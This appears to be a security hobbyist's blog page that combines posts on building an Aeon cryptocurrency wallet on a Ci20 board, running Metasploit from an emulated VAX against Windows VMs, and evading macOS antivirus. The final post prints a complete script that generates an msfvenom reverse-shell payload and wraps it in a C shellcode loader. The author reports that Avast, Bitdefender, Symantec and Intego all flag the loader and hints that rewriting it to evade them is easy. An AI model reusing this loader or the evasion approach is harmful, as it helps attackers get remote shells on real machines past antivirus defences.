 libboost_atomic.so.1.66.0 => /usr/pkg/lib/libboost_atomic.so.1.66.0 (0x76f66000)
 librt.so.1 => /lib/mipsel-linux-gnu/librt.so.1 (0x76f4e000)
 libstdc++.so.6 => /usr/lib/mipsel-linux-gnu/libstdc++.so.6 (0x76e3c000)
 libm.so.6 => /lib/mipsel-linux-gnu/libm.so.6 (0x76dac000)
 libgcc_s.so.1 => /lib/mipsel-linux-gnu/libgcc_s.so.1 (0x76d73000)
 libc.so.6 => /lib/mipsel-linux-gnu/libc.so.6 (0x76bf0000)
 /lib/ld.so.1 (0x7727b000)
 libicudata.so.60 => /usr/pkg/lib/libicudata.so.60 (0x75238000)
 libicui18n.so.60 => /usr/pkg/lib/libicui18n.so.60 (0x74f43000)
 libicuuc.so.60 => /usr/pkg/lib/libicuuc.so.60 (0x74d68000)
 libdl.so.2 => /lib/mipsel-linux-gnu/libdl.so.2 (0x74d55000)

root@ci20:~/bin# ldd simplewallet 
 libpthread.so.0 => /lib/mipsel-linux-gnu/libpthread.so.0 (0x77f88000)
 libboost_system.so.1.66.0 => /usr/pkg/lib/libboost_system.so.1.66.0 (0x77f74000)
 libboost_filesystem.so.1.66.0 => /usr/pkg/lib/libboost_filesystem.so.1.66.0 (0x77f48000)
 libboost_thread.so.1.66.0 => /usr/pkg/lib/libboost_thread.so.1.66.0 (0x77f15000)
 libboost_date_time.so.1.66.0 => /usr/pkg/lib/libboost_date_time.so.1.66.0 (0x77ef4000)
 libboost_chrono.so.1.66.0 => /usr/pkg/lib/libboost_chrono.so.1.66.0 (0x77edd000)
 libboost_regex.so.1.66.0 => /usr/pkg/lib/libboost_regex.so.1.66.0 (0x77da0000)
 libboost_serialization.so.1.66.0 => /usr/pkg/lib/libboost_serialization.so.1.66.0 (0x77d5d000)
 libboost_program_options.so.1.66.0 => /usr/pkg/lib/libboost_program_options.so.1.66.0 (0x77cd1000)
 libboost_atomic.so.1.66.0 => /usr/pkg/lib/libboost_atomic.so.1.66.0 (0x77cbf000)
 librt.so.1 => /lib/mipsel-linux-gnu/librt.so.1 (0x77ca7000)
 libatomic.so.1 => /usr/lib/mipsel-linux-gnu/libatomic.so.1 (0x77c92000)
 libstdc++.so.6 => /usr/lib/mipsel-linux-gnu/libstdc++.so.6 (0x77b7f000)
 libm.so.6 => /lib/mipsel-linux-gnu/libm.so.6 (0x77af0000)
 libgcc_s.so.1 => /lib/mipsel-linux-gnu/libgcc_s.so.1 (0x77ab7000)
 libc.so.6 => /lib/mipsel-linux-gnu/libc.so.6 (0x77934000)
 /lib/ld.so.1 (0x77fd4000)
 libicudata.so.60 => /usr/pkg/lib/libicudata.so.60 (0x75f7b000)
 libicui18n.so.60 => /usr/pkg/lib/libicui18n.so.60 (0x75c87000)
 libicuuc.so.60 => /usr/pkg/lib/libicuuc.so.60 (0x75aac000)
 libdl.so.2 => /lib/mipsel-linux-gnu/libdl.so.2 (0x75a98000)
root@ci20:~/bin#

I have uploaded the binaries here if needed https://45.76.81.249:8000/pkgsrc/debian8-ci20/aeon/

OK, now we have compiled the two, we can test is it works, first the simplewallet

root@ci20:~/bin# ./simplewallet 
aeon wallet v0.9.14.0()
Specify wallet file name (e.g., wallet.bin). If the wallet doesn't exist, it will be created.
Wallet file name: ci20wallet
The wallet doesn't exist, generating new one
password: ******************
<---cut----> 
[wallet XXX111]:

OK, so this works, but we have no access to the Aeon blockchain, so we should use some public Aeon node and connect to it (via a following shell script for example)

root@ci20:~/bin# cat run.wallet.sh 
./simplewallet --wallet-file=./ci20wallet --daemon-address phx-1.snipanet.com:11181

The initial sync with all the transactions will take some time, so be patient.  Do not forget to save the sync data once done. There are multiple online Aeon nodes listed here : https://aeon.wiki/Node

It took approximately 3 hours to sync the simplewallet

Refresh done, blocks received: 257191 
balance: 0.000000000000, unlocked balance: 0.000000000000
**********************************************************************
Use "help" command to see the list of available commands.
**********************************************************************
[wallet XXX111]: [wallet XXX111]:

Next we can try the simpleminer

root@ci20:~/bin# ./simpleminer --pool-addr mine.somepool.com:3333 --login walletaddress --pass x
2018-Mar-15 22:16:15.252403 Connecting mine.somepool.com:3333....
2018-Mar-15 22:16:15.285706 Connected mine.somepool.com:3333 OK
2018-Mar-15 22:16:15.302291 READ ENDS: Success. bytes_tr: 79
2018-Mar-15 22:16:15.303819 READ ENDS: Connection err_code 2
2018-Mar-15 22:16:15.304637 Connection err_code eof.
2018-Mar-15 22:16:15.305173 Returning false because of wrong state machine. state: 5
2018-Mar-15 22:16:15.305650 Failed to invoke http request to /
2018-Mar-15 22:16:15.306115 Failed to invoke login mine.somepool.com:3333, disconnect and sleep....

Hmm so it looks like the simple miner does not work, It would make no sense anyway on the Ci20 device,  maybe its possible to use it from the simplewallet ? But for that you need to wait till your device synces the blokchain transactions via the public Aeon Nodes.

I was invited to run a workshop at  the https://www.security-session.cz/en.html

If you will be in Brno on 7th April drop by.

Workshop will consist of

• Practical demonstration running custom Meterpreter loaders against Windows
• Use of BashBunny in some scenarios
• OpenVMS lab workshop (simulation of VAX, Alpha OpenVMS 7.3/8.3/8.4)

Most of the above will be examples that I have covered here on this blog from the past.

From the past series of computer archeology I wanted to try this in a long time. So what I did was first to get simh VAX NetBSD simulation running on a decent machine (not Ci20)

All the information on how to get NetBSD 8_BETA running on SimH-VAX can be found here -> https://astr0baby.wordpress.com/2018/03/11/running-vax-netbsd-on-mipsel-ci20-creator-board-via-simh/

I have managed to build some binary pkgsrc packages for NetBSD VAX (Including ruby24) with help from @kittenpies3 and keep a repo available here http://45.76.81.249/pkgsrc/vax-simh/

Unfortunately I cannot yet get postgresql-xx-client to build correctly on the VAX NetBSD via pkgsrc so metasploit-current bundler install fails on the pg-0.20.0 gem fails to build due to missing postgresql packages. Hopefully this will get sorted out in the future.

Now Im not expecting metasploit-framework-current (5.0-dev) to run on 256 MB RAM Vax NetBSD system, but at least a test on msfvenom file generation could be done. However what works quite well is the last pre-ruby metasploit-framework 2.8-dev which we gonna try here just now.

Among other tools git is compiled for NetBSD VAX and you can actually use it and pull the metasploit framework2 to you VAX

[user@vaxnetbsd root]# git clone https://github.com/metasploit/framework2.git

Once we get a local copy, I have quickly prepared 2 VirtualBox VMs to test against

• Windows 2000
• Windows XP SP2

In order for these simulated/virtualized  systems to speak to each other over TCP/IP I have used the following trick to connect bot the SimH and Virtual Box VMs

For my VAX simh environment I use the following script to prepare network

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0 vboxnet0
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface eth0 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

On my Virtual Box machine I only use host-only-adapter and set IP manually on Windows

Once all systems are up, they should be able to speak to each other and we can try to exploit the Windows 2000 and Windows XP from the VAX NetBSD simulation.

Attacking Windows 2000

Attacking Windows XP SP2

Decided to upgrade the MacOS in my VirtualBox  to High Sierra and do some testing using customized Metasploit payload loaders there.

Installed the https://www.avast.com/free-mac-security and tested the generators from last year (I was not expecting the results to bypass this AV actually :)) and as expected, the bypass from last year gets picked up now.   ( https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/)

What is super-cool nowadays on MacOS is that when you run gcc in the terminal it will automatically prompt you to install the Xcode stuff from Apple, so this time I have used the following

So I went up to build my loaders and all the payloads no matter what get flagged now by Avast

And I started to wonder why …

My original code looked like this  ->

clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) " 
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo '[*] Cleaning up ' 
rm -f osx64-payload.c
./msfvenom -p osx/x64/dupandexecve/reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c 
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c 
echo '#include <stdint.h>' >> temp.c 
echo '' >> temp.c 
cat test.c >> temp.c 
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: 0x%x",ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
 echo '[-] Something went wrong .. '
exit 0
fi

And once I have put the generated (On Linux)  source code to the MacOS and compiled it via gcc it got flagged immediately.

Whats interesting is that no matter what is in the unsigned char/signed char stuff it gets flagged anyway as you can see in the screenshot here

So Avast seems to be tagging only the int main part obviously, as it does not even try do see what the shellcode does …. any bogus stuff can be there … so now comes a 5 cent question … how hard is it to re-write the loader ? :)

Hint .. about 5 seconds ?

Same goes for Bitdefender for MacOS

And Symantec AV

And Intego Mac Internet Security X9